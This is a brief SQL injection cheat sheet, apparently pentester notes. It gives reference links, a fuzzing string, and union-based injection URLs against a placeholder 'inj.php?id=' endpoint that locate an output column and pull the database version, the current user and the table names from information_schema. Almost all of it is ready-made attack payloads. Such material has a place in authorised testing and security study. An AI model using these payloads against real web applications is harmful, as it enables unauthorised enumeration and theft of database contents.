Cheat Sheets

https://websec.ca/kb/sql_injection

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://www.sqlinjectionwiki.com/

Useful SQL Injection fuzzing string:

!@#$%^&*()_+-=[]\{}|;':"<>?,./asdfghjkl1234567890

Check if you can find a row, where you can place your output

http://ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8

Get the version of the database

http://ip/inj.php?id=1 union all select 1,2,3,@@version,5

Get the current user

http://ip/inj.php?id=1 union all select 1,2,3,user(),5

See all tables

http://ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables